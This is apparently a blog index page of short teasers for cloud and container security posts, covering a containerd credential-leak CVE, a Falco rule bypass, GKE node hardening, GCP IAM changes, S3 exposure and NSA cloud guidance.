CVE-2020-15157: If an attacker publishes a public image with a crafted manifest that directs one of the image layers to be fetched from a web server they control and they trick a user or system into pulling the image, they can obtain the credentials used by ctr/containerd to access that registry. In some cases, this may be the user’s username and password for the registry. In other cases, this may be the credentials attached to the cloud virtual instance which can grant access to other cloud resources in the account.
Recently, when doing a bit of research of how Falco rules work, we discovered a default rule that alerts when privileged containers or containers that mount sensitive file paths are run inside a Kubernetes cluster could be “bypassed” if the image name was cleverly formatted.
When Shielded GKE Nodes is enabled, the GKE control plane cryptographically verifies that every node in the cluster is a virtual machine running in a managed instance group in Google’s data center and that the kubelet is only getting the certificate for itself. But Shielded GKE Nodes addresses a much bigger problem.
For organizations moving workloads to the cloud, the primary focus is rarely on security. In most cases, the goal is to get the environment migrated or an application deployed and to the point of working. At some point down the road, making sure the environment is secure enough to run in production becomes a priority. Great, but how do we do that?
During one of our Google Cloud Platform (GCP) security assessments, we noticed that one of the Predefined IAM Roles had more permissions than before. After a bit, we noticed the GCP IAM Permissions Change Log explained which permissions were added. So, we decided to automatically track those changes, and the results have been enlightening.
Is Ruby too slow to be taken seriously in modern, fast-paced, enterprise-scale cloud environments? According to Twitter, StackOverflow, and all the cool kids except this one, the answer seems to be “Yes!” Surely the right tool these days would be Node, Go, Rust, or even Python. Nothing fast is built with Ruby, right? Let’s find out…
Cloud security configuration scanning tools and similar approaches offer great insight at the technical level and are a foundational component of a risk assessment strategy. Prioritizing risk mitigation based on that low level output alone misses something critical (pun intended): organizational context.
“What would happen if an attacker understood Kubernetes better than your operations team?” That was the core question that Ian Coldwater and I posed to each other, and it became clear that the research in this area is underexplored. Last week at RSA Conference 2020 we had the honor of presenting our thoughts on what attackers would do, how they might do it, and how they might try to avoid detection. We look forward to presenting an even more advanced version of this talk at KubeCon EU 2020.
When discussing the risk S3 buckets pose to organizations, the majority of the discussion is around public buckets and inadvertently exposing access. While this is certainly a common threat vector, it can be addressed in a number of policy-driven ways. Blocking the ability to accidentally expose buckets at the organization or account level is much more practical now, and probably a more scalable and sound approach than trying to implement a reactive solution.
The National Security Agency (NSA) today published guidance aimed at “organizational leadership and technical staff”, outlining practical ways organizations can mitigate the most common cloud vulnerabilities. In this post, we’ll highlight the key elements of the NSA’s guidance for convenient reference. The full report is linked below.
Despite advances in Amazon Web Services (AWS) controls around S3 (Amazon Simple Storage Service), we continue to see data leaks and breaches centered around data stored on S3. In November 2018, Amazon released the Block Public Access feature to make it easier to secure access to S3. Newly created S3 buckets have always been private by default, but there is still confusion around the different ways data in an S3 bucket can become public.